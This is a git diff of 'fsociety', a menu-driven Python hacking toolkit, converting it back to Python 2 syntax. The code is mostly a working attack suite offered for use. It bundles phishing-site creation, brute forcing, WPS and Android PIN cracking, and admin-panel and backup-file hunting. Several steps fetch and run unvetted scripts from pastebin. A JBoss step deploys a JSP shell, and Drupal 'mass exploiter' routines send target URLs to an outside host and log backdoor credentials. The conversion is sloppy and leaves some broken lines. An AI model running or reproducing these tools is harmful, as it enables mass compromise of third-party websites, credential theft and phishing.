diff --git a/fsociety.py b/fsociety.py index 4f9e7f5..56f6573 100644 --- a/fsociety.py +++ b/fsociety.py @@ -20,10 +20,10 @@ import sys import argparse import os -import http.client +import httplib import subprocess import re -import urllib.request +import urllib2 import socket import urllib import sys @@ -31,17 +31,16 @@ import telnetlib import glob import random -from queue import Queue +import Queue import threading import base64 import time -import configparser +import ConfigParser from sys import argv -#from commands import * +from commands import * from getpass import getpass from xml.dom import minidom -#from urlparse import urlparse -import urllib.parse +from urlparse import urlparse from optparse import OptionParser from time import gmtime, strftime, sleep @@ -68,7 +67,7 @@ def clearScr(): def yesOrNo(): - return(input("Continue Y / N: ") in yes) + return (raw_input("Continue Y / N: ") in yes) ''' @@ -77,7 +76,7 @@ def yesOrNo(): installDir = os.path.dirname(os.path.abspath(__file__)) + '/' configFile = installDir + "/fsociety.cfg" print(installDir) -config = configparser.RawConfigParser() +config = ConfigParser.RawConfigParser() config.read(configFile) toolDir = installDir + config.get('fsociety', 'toolDir') @@ -136,7 +135,7 @@ def agreement(): clearScr() print(termsAndConditions) print(mrrobot4) - agree = input("You must agree to our terms and conditions first (Y/n) ").lower() + agree = raw_input("You must agree to our terms and conditions first (Y/n) ").lower() if agree in yes: config.set('fsociety', 'agreement', 'true') @@ -144,7 +143,7 @@ class fsociety: def __init__(self): clearScr() self.createFolders() - print(fsocietylogo + color.RED + ''' + print (fsocietylogo + color.RED + ''' }--------------{+} Coded By Manisso {+}--------------{ }--------{+} GitHub.com/Manisso/fsociety {+}--------{ ''' + color.END + ''' @@ -160,7 +159,7 @@ def __init__(self): {11}-CONTRIBUTORS {99}-EXIT\n ''') - choice = input(fsocietyPrompt) + choice = raw_input(fsocietyPrompt) clearScr() if choice == "1": informationGatheringMenu() @@ -204,7 +203,7 @@ def githubContributors(self): YboodP YbodP 88 Y8 88 88 Yb 88 88oodP 8bodP' ''') contributorsURL = 'https://api.github.com/repos/manisso/fsociety/contributors' - jsonResponseList = json.loads(urllib.request.urlopen(contributorsURL).read()) + jsonResponseList = json.loads(urllib2.urlopen(contributorsURL).read()) for dictionary in jsonResponseList: print(" * %s" % dictionary['login']) print('\n') @@ -216,7 +215,7 @@ def createFolders(self): os.makedirs(logDir) def completed(self): - input("Completed, click return to go back") + raw_input("Completed, click return to go back") self.__init__() def update(self): @@ -243,7 +242,7 @@ def __init__(self): " {3}--pyPISHER - Tool to create a mallicious website for password pishing") print(" {4}--SMTP Mailer - Tool to send SMTP mail\n ") print(" {99}-Back To Main Menu \n") - choice6 = input(fsocietyPrompt) + choice6 = raw_input(fsocietyPrompt) clearScr() if choice6 == "1": setoolkit() @@ -260,7 +259,7 @@ def __init__(self): self.completed() def completed(self): - input("Completed, click return to go back") + raw_input("Completed, click return to go back") self.__init__() @@ -289,7 +288,7 @@ def __init__(self): " {11}-BruteX - Automatically brute force all services running on a target") print(" {12}-Arachni - Web Application Security Scanner Framework \n ") print(" {99}-Back To Main Menu \n") - choiceweb = input(fsocietyPrompt) + choiceweb = raw_input(fsocietyPrompt) clearScr() if choiceweb == "1": maine() @@ -322,7 +321,7 @@ def __init__(self): self.completed() def completed(self): - input("Completed, click return to go back") + raw_input("Completed, click return to go back") self.__init__() @@ -337,12 +336,12 @@ class privateWebHacking: def __init__(self): clearScr() print(self.menuLogo) - target = input("Enter Target IP: ") + target = raw_input("Enter Target IP: ") Fscan(target) self.completed() def completed(self): - input("Completed, click return to go back") + raw_input("Completed, click return to go back") self.__init__() @@ -361,7 +360,7 @@ def __init__(self): print(" {2}--POET") print(" {3}--Phishing Framework \n") print(" {99}-Return to main menu \n ") - choice11 = input(fsocietyPrompt) + choice11 = raw_input(fsocietyPrompt) clearScr() if choice11 == "1": sitechecker() @@ -376,7 +375,7 @@ def __init__(self): self.completed() def completed(self): - input("Completed, click return to go back") + raw_input("Completed, click return to go back") self.__init__() @@ -406,7 +405,7 @@ def __init__(self): print(" {7}--Doork") print(" {8}--Crips\n ") print(" {99}-Back To Main Menu \n") - choice2 = input(fsocietyPrompt) + choice2 = raw_input(fsocietyPrompt) clearScr() if choice2 == "1": nmap() @@ -431,7 +430,7 @@ def __init__(self): self.completed() def completed(self): - input("Completed, click return to go back") + raw_input("Completed, click return to go back") self.__init__() @@ -467,7 +466,7 @@ def install(self): def run(self): clearScr() print(self.nmapLogo) - target = input(self.targetPrompt) + target = raw_input(self.targetPrompt) self.menu(target) def menu(self, target): @@ -478,19 +477,19 @@ def menu(self, target): print(" {2}--Port Scan [-Pn]") print(" {3}--Operating System Detection [-A]\n") print(" {99}-Return to information gathering menu \n") - response = input("nmap ~# ") + response = raw_input("nmap ~# ") clearScr() logPath = "logs/nmap-" + strftime("%Y-%m-%d_%H:%M:%S", gmtime()) try: if response == "1": os.system("nmap -sV -oN %s %s" % (logPath, target)) - response = input(continuePrompt) + response = raw_input(continuePrompt) elif response == "2": os.system("nmap -Pn -oN %s %s" % (logPath, target)) - response = input(continuePrompt) + response = raw_input(continuePrompt) elif response == "3": os.system("nmap -A -oN %s %s" % (logPath, target)) - response = input(continuePrompt) + response = raw_input(continuePrompt) elif response == "99": pass else: @@ -510,7 +509,7 @@ def __init__(self): else: print(alreadyInstalled) self.run() - response = input(continuePrompt) + response = raw_input(continuePrompt) def installed(self): return (os.path.isfile("/usr/bin/setoolkit")) @@ -537,10 +536,10 @@ class host2ip: def __init__(self): clearScr() print(self.host2ipLogo) - host = input(" Enter a Host: ") + host = raw_input(" Enter a Host: ") ip = socket.gethostbyname(host) print(" %s has the IP of %s" % (host, ip)) - response = input(continuePrompt) + response = raw_input(continuePrompt) class wpscan: @@ -559,7 +558,7 @@ def __init__(self): self.install() clearScr() print(self.wpscanLogo) - target = input(" Enter a Target: ") + target = raw_input(" Enter a Target: ") self.menu(target) def installed(self): @@ -577,7 +576,7 @@ def menu(self, target): print(" {2}--Plugin Enumeration [--enumerate p]") print(" {3}--All Enumeration Tools [--enumerate]\n") print(" {99}-Return to information gathering menu \n") - response = input("wpscan ~# ") + response = raw_input("wpscan ~# ") clearScr() logPath = "../../logs/wpscan-" + \ strftime("%Y-%m-%d_%H:%M:%S", gmtime()) + ".txt" @@ -586,15 +585,15 @@ def menu(self, target): if response == "1": os.system( "ruby tools/wpscan/wpscan.rb %s --enumerate u --log %s" % (wpscanOptions, logPath)) - response = input(continuePrompt) + response = raw_input(continuePrompt) elif response == "2": os.system( "ruby tools/wpscan/wpscan.rb %s --enumerate p --log %s" % (wpscanOptions, logPath)) - response = input(continuePrompt) + response = raw_input(continuePrompt) elif response == "3": os.system( "ruby tools/wpscan/wpscan.rb %s --enumerate --log %s" % (wpscanOptions, logPath)) - response = input(continuePrompt) + response = raw_input(continuePrompt) elif response == "99": pass else: @@ -619,9 +618,9 @@ def __init__(self): self.install() clearScr() print(self.CMSmapLogo) - target = input(" Enter a Target: ") + target = raw_input(" Enter a Target: ") self.run(target) - response = input(continuePrompt) + response = raw_input(continuePrompt) def installed(self): return (os.path.isdir(self.installDir)) @@ -657,7 +656,7 @@ def __init__(self): clearScr() print(self.XSStrikeLogo) self.run() - response = input(continuePrompt) + response = raw_input(continuePrompt) def installed(self): return (os.path.isdir(self.installDir)) @@ -687,9 +686,9 @@ def __init__(self): self.install() clearScr() print(self.doorkLogo) - target = input(" Enter a Target: ") + target = raw_input(" Enter a Target: ") self.run(target) - response = input(continuePrompt) + response = raw_input(continuePrompt) def installed(self): return (os.path.isdir(self.installDir)) @@ -764,7 +763,7 @@ def __init__(self): print( " {2}--BruteX - Automatically bruteforces all services running on a target\n") print(" {99}-Back To Main Menu \n") - choice3 = input("passwd ~# ") + choice3 = raw_input("passwd ~# ") clearScr() if choice3 == "1": cupp() @@ -777,7 +776,7 @@ def __init__(self): self.completed() def completed(self): - input("Completed, click return to go back") + raw_input("Completed, click return to go back") self.__init__() @@ -830,7 +829,7 @@ def __init__(self): print(" {2}--pixiewps") print(" {3}--Bluetooth Honeypot GUI Framework \n") print(" {99}-Back To The Main Menu \n") - choice4 = input(fsocietyPrompt) + choice4 = raw_input(fsocietyPrompt) clearScr() if choice4 == "1": reaver() @@ -845,7 +844,7 @@ def __init__(self): self.completed() def completed(self): - input("Completed, click return to go back") + raw_input("Completed, click return to go back") self.__init__() @@ -948,7 +947,7 @@ def __init__(self): print(" {8}--Bruteforce the Android Passcode given the hash and salt") print(" {9}--Joomla SQL injection Scanner \n ") print(" {99}-Go Back To Main Menu \n") - choice5 = input(fsocietyPrompt) + choice5 = raw_input(fsocietyPrompt) clearScr() if choice5 == "1": atscan() @@ -975,7 +974,7 @@ def __init__(self): self.completed() def completed(self): - input("Completed, click return to go back") + raw_input("Completed, click return to go back") self.__init__() @@ -1000,7 +999,7 @@ def install(self): os.system("cd %s && chmod +x install.sh && ./install.sh" % self.installDir) def run(self): - target = input("Enter Target IP: ") + target = raw_input("Enter Target IP: ") os.system("brutex %s" % target) @@ -1025,7 +1024,7 @@ def install(self): "gem install bundler && bundle install --without prof && rake install") def run(self): - target = input("Enter Target Hostname: ") + target = raw_input("Enter Target Hostname: ") os.system("arachni %s --output-debug 2> %sarachni/%s.log" % (target, logDir, strftime("%Y-%m-%d_%H:%M:%S", gmtime()))) @@ -1046,7 +1045,7 @@ def gabriel(): os.system("wget http://pastebin.com/raw/Szg20yUh --output-document=gabriel.py") clearScr() os.system("python gabriel.py") - ftpbypass = input("Enter Target IP and Use Command:") + ftpbypass = raw_input("Enter Target IP and Use Command:") os.system("python gabriel.py %s" % ftpbypass) @@ -1059,7 +1058,7 @@ def sitechecker(): def ifinurl(): print(''' This Advanced search in search engines, enables analysis provided to exploit GET / POST capturing emails & urls, with an internal custom validation junction for each target / url found.''') print('Do You Want To Install InurlBR ? ') - cinurl = input("Y/N: ") + cinurl = raw_input("Y/N: ") if cinurl in yes: inurl() else: @@ -1069,14 +1068,14 @@ def ifinurl(): def bsqlbf(): clearScr() print("This tool will only work on blind sql injection") - cbsq = input("select target: ") + cbsq = raw_input("select target: ") os.system("wget https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/bsqlbf-v2/bsqlbf-v2-7.pl -o bsqlbf.pl") os.system("perl bsqlbf.pl -url %s" % cbsq) os.system("rm bsqlbf.pl") def atscan(): - print("Do You To Install ATSCAN ?") + print ("Do You To Install ATSCAN ?") if yesOrNo(): os.system("rm -rf ATSCAN") os.system( @@ -1086,8 +1085,8 @@ def atscan(): def commix(): - print("Automated All-in-One OS Command Injection and Exploitation Tool.") - print("usage: python commix.py --help") + print ("Automated All-in-One OS Command Injection and Exploitation Tool.") + print ("usage: python commix.py --help") if yesOrNo(): os.system( "git clone --depth=1 https://github.com/stasinopoulos/commix.git commix") @@ -1107,13 +1106,13 @@ def joomlarce(): os.system("wget http://pastebin.com/raw/EX7Gcbxk --output-document=temp.py") clearScr() print("if the response is 200 , you will find your shell in Joomla_3.5_Shell.txt") - jmtarget = input("Select a targets list:") + jmtarget = raw_input("Select a targets list:") os.system("python temp.py %s" % jmtarget) def inurl(): - dork = input("select a Dork:") - output = input("select a file to save:") + dork = raw_input("select a Dork:") + output = raw_input("select a file to save:") os.system( "./inurlbr.php --dork '{0}' -s {1}.txt -q 1,6 -t 1".format(dork, output)) webHackingMenu.completed("InurlBR") @@ -1131,11 +1130,11 @@ def insinurl(): def jboss(): clearScr() - print("This JBoss script deploys a JSP shell on the target JBoss AS server. Once") - print("deployed, the script uses its upload and command execution capability to") - print("provide an interactive session.") - print("") - print("usage: ./e.sh target_ip tcp_port ") + print ("This JBoss script deploys a JSP shell on the target JBoss AS server. Once") + print ("deployed, the script uses its upload and command execution capability to") + print ("provide an interactive session.") + print ("") + print ("usage: ./e.sh target_ip tcp_port ") print("Continue: y/n") if yesOrNo(): os.system( @@ -1146,13 +1145,13 @@ def jboss(): def wppluginscan(): Notfound = [404, 401, 400, 403, 406, 301] - sitesfile = input("sites file: ") - filepath = input("Plugins File: ") + sitesfile = raw_input("sites file: ") + filepath = raw_input("Plugins File: ") def scan(site, dir): global resp try: - conn = http.client.HTTPConnection(site) + conn = httplib.HTTPConnection(site) conn.request('HEAD', "/wp-content/plugins/" + dir) resp = conn.getresponse().status except Exception as message: @@ -1179,7 +1178,7 @@ def main(): def sqlmap(): - print("usage: python sqlmap.py -h") + print ("usage: python sqlmap.py -h") if yesOrNo(): os.system( "git clone --depth=1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev & ") @@ -1192,9 +1191,9 @@ def grabuploadedlink(url): for dir in directories: currentcode = urllib.urlopen(url + dir).getcode() if currentcode == 200 or currentcode == 403: - print("-------------------------") - print(" [ + ] Found Directory: " + str(url + dir) + " [ + ]") - print("-------------------------") + print "-------------------------" + print " [ + ] Found Directory: " + str(url + dir) + " [ + ]" + print "-------------------------" upload.append(url + dir) except: pass @@ -1206,17 +1205,17 @@ def grabshell(url): for shell in shells: currentcode = urllib.urlopen(upl + shell).getcode() if currentcode == 200: - print("-------------------------") - print(" [ ! ] Found Shell: " + \ - str(upl + shell) + " [ ! ]") - print("-------------------------") + print "-------------------------" + print " [ ! ] Found Shell: " + \ + str(upl + shell) + " [ ! ]" + print "-------------------------" except: pass def shelltarget(): print("Exemple: http://target.com") - line = input("target: ") + line = raw_input("target: ") line = line.rstrip() grabuploadedlink(line) grabshell(line) @@ -1291,11 +1290,11 @@ def check_gravityforms(sites): def gravity(): - ip = input('Enter IP: ') + ip = raw_input('Enter IP: ') sites = bing_all_grabber(str(ip)) gravityforms = check_gravityforms(sites) for ss in gravityforms: - print(ss) + print ss print('\n') print('[*] Found, ', len(gravityforms), ' gravityforms.') @@ -1312,8 +1311,8 @@ def shellnoob(): def androidhash(): - key = input("Enter the android hash: ") - salt = input("Enter the android salt: ") + key = raw_input("Enter the android hash: ") + salt = raw_input("Enter the android salt: ") os.system( "git clone --depth=1 https://github.com/PentesterES/AndroidPINCrack.git") os.system( @@ -1322,7 +1321,7 @@ def androidhash(): def cmsfew(): print("your target must be Joomla, Mambo, PHP-Nuke, and XOOPS Only ") - target = input("Select a target: ") + target = raw_input("Select a target: ") os.system( "wget https://dl.packetstormsecurity.net/UNIX/scanners/cms_few.py.txt -O cms.py") os.system("python cms.py %s" % target) @@ -1371,9 +1370,9 @@ class Fscan: def __init__(self, serverip): self.serverip = serverip self.getSites(False) - print(menu) + print menuu while True: - choice = input(fsocietyPrompt) + choice = raw_input(fsocietyPrompt) if choice == '1': self.getSites(True) elif choice == '2': @@ -1391,7 +1390,7 @@ def __init__(self, serverip): elif choice == '8': self.grabSqli() elif choice == '9': - ran = input(' Enter range of ports, (ex: 1-1000) -> ') + ran = raw_input(' Enter range of ports, (ex: 1-1000) -> ') self.portScanner(1, ran) elif choice == '10': self.portScanner(2, None) @@ -1401,12 +1400,12 @@ def __init__(self, serverip): self.cloudflareBypasser() elif choice == '99': fsociety() - con = input(' Continue [Y/n] -> ') + con = raw_input(' Continue [Y/n] -> ') if con[0].upper() == 'N': exit() else: clearScr() - print(menuu) + print menuu def getSites(self, a): ''' @@ -1440,7 +1439,7 @@ def getSites(self, a): clearScr() print('[*] Found ', len(lista), ' Website\n') for site in self.sites: - print(site) + print site def getWordpress(self): ''' @@ -1469,7 +1468,7 @@ def getWordpress(self): clearScr() print('[*] Found ', len(lista), ' Wordpress Website\n') for site in lista: - print(site) + print site def getJoomla(self): ''' @@ -1494,7 +1493,7 @@ def getJoomla(self): clearScr() print('[*] Found ' + len(lista) + ' Joomla Website\n') for site in lista: - print(site) + print site ############################ # find admin panels @@ -1504,14 +1503,15 @@ def findPanels(self): the attacker may do a lot of vulnerability tests on the admin area ''' - print("[~] Finding admin panels") - adminList=['admin/', 'site/admin', 'admin.php/', 'up/admin/', 'central/admin/', 'whm/admin/', 'whmcs/admin/', 'support/admin/', 'upload/admin/', 'video/admin/', 'shop/admin/', 'shoping/admin/', 'wp-admin/', 'wp/wp-admin/', 'blog/wp-admin/', 'admincp/', 'admincp.php/', 'vb/admincp/', 'forum/admincp/', 'up/admincp/', 'administrator/', 'administrator.php/', 'joomla/administrator/', 'jm/administrator/', 'site/administrator/', 'install/', 'vb/install/', 'dimcp/', 'clientes/', 'admin_cp/', 'login/', 'login.php', 'site/login', 'site/login.php', 'up/login/', 'up/login.php', 'cp.php', 'cp','up/cp', 'master', 'adm', 'member', 'control', 'webmaster', 'myadmin', 'admin_cp', 'admin_site',] + print "[~] Finding admin panels" + adminList = ['admin/', 'site/admin', 'admin.php/', 'up/admin/', 'central/admin/', 'whm/admin/', 'whmcs/admin/', 'support/admin/', 'upload/admin/', 'video/admin/', 'shop/admin/', 'shoping/admin/', 'wp-admin/', 'wp/wp-admin/', 'blog/wp-admin/', 'admincp/', 'admincp.php/', 'vb/admincp/', 'forum/admincp/', 'up/admincp/', 'administrator/', + 'administrator.php/', 'joomla/administrator/', 'jm/administrator/', 'site/administrator/', 'install/', 'vb/install/', 'dimcp/', 'clientes/', 'admin_cp/', 'login/', 'login.php', 'site/login', 'site/login.php', 'up/login/', 'up/login.php', 'cp.php', 'up/cp', 'cp', 'master', 'adm', 'member', 'control', 'webmaster', 'myadmin', 'admin_cp', 'admin_site'] clearScr() for site in self.sites: for admin in adminList: try: if urllib.urlopen(site + admin).getcode() == 200: - print(" [*] Found admin panel -> ", site + admin) + print " [*] Found admin panel -> ", site + admin except IOError: pass ############################ @@ -1525,12 +1525,12 @@ def findZip(self): zipList = ['backup.tar.gz', 'backup/backup.tar.gz', 'backup/backup.zip', 'vb/backup.zip', 'site/backup.zip', 'backup.zip', 'backup.rar', 'backup.sql', 'vb/vb.zip', 'vb.zip', 'vb.sql', 'vb.rar', 'vb1.zip', 'vb2.zip', 'vbb.zip', 'vb3.zip', 'upload.zip', 'up/upload.zip', 'joomla.zip', 'joomla.rar', 'joomla.sql', 'wordpress.zip', 'wp/wordpress.zip', 'blog/wordpress.zip', 'wordpress.rar'] clearScr() - print("[~] Finding zip file") + print "[~] Finding zip file" for site in self.sites: for zip1 in zipList: try: if urllib.urlopen(site + zip1).getcode() == 200: - print(" [*] Found zip file -> ", site + zip1) + print " [*] Found zip file -> ", site + zip1 except IOError: pass @@ -1543,7 +1543,7 @@ def findUp(self): upList = ['up.php', 'up1.php', 'up/up.php', 'site/up.php', 'vb/up.php', 'forum/up.php', 'blog/up.php', 'upload.php', 'upload1.php', 'upload2.php', 'vb/upload.php', 'forum/upload.php', 'blog/upload.php', 'site/upload.php', 'download.php'] clearScr() - print("[~] Finding Upload") + print "[~] Finding Upload" for site in self.sites: for up in upList: try: @@ -1551,7 +1551,7 @@ def findUp(self): html = urllib.urlopen(site + up).readlines() for line in html: if re.findall('type=file', line): - print(" [*] Found upload -> ", site + up) + print " [*] Found upload -> ", site + up except IOError: pass @@ -1564,7 +1564,7 @@ def getUsers(self): (you can use medusa or hydra) ''' clearScr() - print("[~] Grabbing Users") + print "[~] Grabbing Users" userslist = [] for site1 in self.sites: try: @@ -1579,11 +1579,11 @@ def getUsers(self): resp = urllib2.urlopen( site1 + '/cgi-sys/guestbook.cgi?user=%s' % site).read() if 'invalid username' not in resp.lower(): - print('\t [*] Found -> ', site) + print '\t [*] Found -> ', site userslist.append(site) break else: - print(site) + print site site = site[:-1] except: @@ -1591,7 +1591,7 @@ def getUsers(self): clearScr() for user in userslist: - print(user) + print user def cloudflareBypasser(self): ''' @@ -1600,7 +1600,7 @@ def cloudflareBypasser(self): method from a guy in madleets ''' clearScr() - print("[~] Bypassing cloudflare") + print "[~] Bypassing cloudflare" subdoms = ['mail', 'webmail', 'ftp', 'direct', 'cpanel'] for site in self.sites: site.replace('http://', '') @@ -1611,11 +1611,11 @@ def cloudflareBypasser(self): pass for sub in subdoms: doo = sub + '.' + site - print(' [~] Trying -> ', doo) + print ' [~] Trying -> ', doo try: ddd = socket.gethostbyname(doo) if ddd != ip: - print(' [*] Cloudflare bypassed -> ', ddd) + print ' [*] Cloudflare bypassed -> ', ddd break except socket.error: pass @@ -1630,7 +1630,8 @@ def getServerBanner(self): try: s = 'http://' + self.serverip httpresponse = urllib.urlopen(s) - print(' [*] Server header -> ', httpresponse.headers.getheader('server')) + print ' [*] Server header -> ', httpresponse.headers.getheader( + 'server') except: print('[*] Server header -> Not Found') @@ -1666,7 +1667,7 @@ def checkSqli(self, s): tool in my blog ''' clearScr() - print("[~] Checking SQL injection") + print "[~] Checking SQL injection" payloads = ["3'", "3%5c", "3%27%22%28%29", "3'><", "3%22%5C%27%5C%22%29%3B%7C%5D%2A%7B%250d%250a%3C%2500%3E%25bf%2527%27"] check = re.compile( @@ -1681,7 +1682,7 @@ def checkSqli(self, s): for line in html: checker = re.findall(check, line) if len(checker) != 0: - print(' [*] SQLi found -> ', power) + print ' [*] SQLi found -> ', power except: pass @@ -1692,7 +1693,7 @@ def portScanner(self, mode, ran): or with common ports (al-swisre idea) ''' clearScr() - print("[~] Scanning Ports") + print "[~] Scanning Ports" if mode == 1: a = ran.split('-') @@ -1710,7 +1711,7 @@ def do_it(ip, port): sock = sock.connect_ex((ip, port)) if sock == 0: - print(" [*] Port %i is open" % port) + print " [*] Port %i is open" % port ############################ @@ -1724,7 +1725,7 @@ def do_it(ip, port): def drupal(): '''Drupal Exploit Binger All Websites Of server ''' - ip = input('1- IP: ') + ip = raw_input('1- IP: ') page = 1 while page <= 50: @@ -1740,32 +1741,32 @@ def drupal(): for url in findurl: try: - urlpa = urllib.parse(url) + urlpa = urlparse(url) site = urlpa.netloc - print("[+] Testing At " + site) + print "[+] Testing At " + site resp = urllib2.urlopen( 'http://crig-alda.ro/wp-admin/css/index2.php?url=' + site + '&submit=submit') read = resp.read() if "User: HolaKo" in read: - print("Exploit found =>" + site) + print "Exploit found =>" + site - print("user:HolaKo\npass:admin") + print "user:HolaKo\npass:admin" a = open('up.txt', 'a') a.write(site + '\n') a.write("user:" + user + "\npass:" + pwd + "\n") else: - print("[-] Expl Not Found:( ") + print "[-] Expl Not Found:( " except Exception as ex: - print(ex) + print ex sys.exit(0) # Drupal Server ExtraCtor def getdrupal(): - ip = input('Enter The Ip: ') + ip = raw_input('Enter The Ip: ') page = 1 sites = list() while page <= 50: @@ -1779,17 +1780,17 @@ def getdrupal(): page += 1 for url in findurl: - split = urllib.parse(url) + split = urlparse(url) site = split.netloc if site not in sites: - print(site) + print site sites.append(site) # Drupal Mass List Exploiter def drupallist(): - listop = input("Enter The list Txt: ") + listop = raw_input("Enter The list Txt: ") fileopen = open(listop, 'r') content = fileopen.readlines() for i in content: @@ -1799,22 +1800,22 @@ def drupallist(): 'http://crig-alda.ro/wp-admin/css/index2.php?url=' + url + '&submit=submit') readcontent = openurl.read() if "Success" in readcontent: - print("[+]Success =>" + url) - print("[-]username:HolaKo\n[-]password:admin") + print "[+]Success =>" + url + print "[-]username:HolaKo\n[-]password:admin" save = open('drupal.txt', 'a') save.write( url + "\n" + "[-]username:HolaKo\n[-]password:admin\n") else: - print(i + "=> exploit not found ") + print i + "=> exploit not found " except Exception as ex: - print(ex) + print ex def maine(): - print(minu) - choose = input("choose a number: ") + print minu + choose = raw_input("choose a number: ") while True: if choose == "1": @@ -1890,20 +1891,20 @@ def check_joomla(sites): def wppjmla(): - ipp = input('Enter Target IP: ') + ipp = raw_input('Enter Target IP: ') sites = bing_all_grabber(str(ipp)) wordpress = check_wordpress(sites) joomla = check_joomla(sites) for ss in wordpress: - print(ss) - print('[+] Found ! ', len(wordpress), ' Wordpress Websites') - print('-' * 30 + '\n') + print ss + print '[+] Found ! ', len(wordpress), ' Wordpress Websites' + print '-' * 30 + '\n' for ss in joomla: - print(ss) + print ss - print('[+] Found ! ', len(joomla), ' Joomla Websites') + print '[+] Found ! ', len(joomla), ' Joomla Websites' - print('\n') + print '\n' # initialise the fscan function ############################ @@ -1911,8 +1912,8 @@ def wppjmla(): def grabsqli(ip): try: - print(color.OKBLUE + "Check_Uplaod... ") - print('\n') + print color.OKBLUE + "Check_Uplaod... " + print '\n' page = 1 while page <= 21: @@ -1926,7 +1927,7 @@ def grabsqli(ip): try: response = urllib2.urlopen(i).read() checksqli(i) - except urllib2.HTTPError as e: + except urllib2.HTTPError, e: str(sites).strip(i) page = page + 10 @@ -1942,7 +1943,7 @@ def checksqli(sqli): def sqlscan(): - ip = input('Enter IP -> ') + ip = raw_input('Enter IP -> ') grabsqli(ip) @@ -2052,7 +2053,7 @@ def check_wpsymposium(sites): def wpminiscanner(): - ip = input('Enter IP: ') + ip = raw_input('Enter IP: ') sites = bing_all_grabber(str(ip)) wordpress = check_wordpress(sites) wpstorethemeremotefileupload = check_wpstorethemeremotefileupload(sites) @@ -2061,32 +2062,32 @@ def wpminiscanner(): wpeasyupload = check_wpeasyupload(sites) wpsymposium = check_wpsymposium(sites) for ss in wordpress: - print(ss) - print('[*] Found, ', len(wordpress), ' wordpress sites.') - print('-' * 30 + '\n') + print ss + print '[*] Found, ', len(wordpress), ' wordpress sites.' + print '-' * 30 + '\n' for ss in wpstorethemeremotefileupload: - print(ss) - print('[*] Found, ', len( - wpstorethemeremotefileupload), ' wp_storethemeremotefileupload exploit.') - print('-' * 30 + '\n') + print ss + print '[*] Found, ', len( + wpstorethemeremotefileupload), ' wp_storethemeremotefileupload exploit.' + print '-' * 30 + '\n' for ss in wpcontactcreativeform: - print(ss) - print('[*] Found, ', len(wpcontactcreativeform), ' wp_contactcreativeform exploit.') - print('-' * 30 + '\n') + print ss + print '[*] Found, ', len(wpcontactcreativeform), ' wp_contactcreativeform exploit.' + print '-' * 30 + '\n' for ss in wplazyseoplugin: - print(ss) - print('[*] Found, ', len(wplazyseoplugin), ' wp_lazyseoplugin exploit.') - print('-' * 30 + '\n') + print ss + print '[*] Found, ', len(wplazyseoplugin), ' wp_lazyseoplugin exploit.' + print '-' * 30 + '\n' for ss in wpeasyupload: - print(ss) - print('[*] Found, ', len(wpeasyupload), ' wp_easyupload exploit.') - print('-' * 30 + '\n') + print ss + print '[*] Found, ', len(wpeasyupload), ' wp_easyupload exploit.' + print '-' * 30 + '\n' for ss in wpsymposium: - print(ss) + print ss - print('[*] Found, ', len(wpsymposium), ' wp_sympsiup exploit.') + print '[*] Found, ', len(wpsymposium), ' wp_sympsiup exploit.' - print('\n') + print '\n' ############################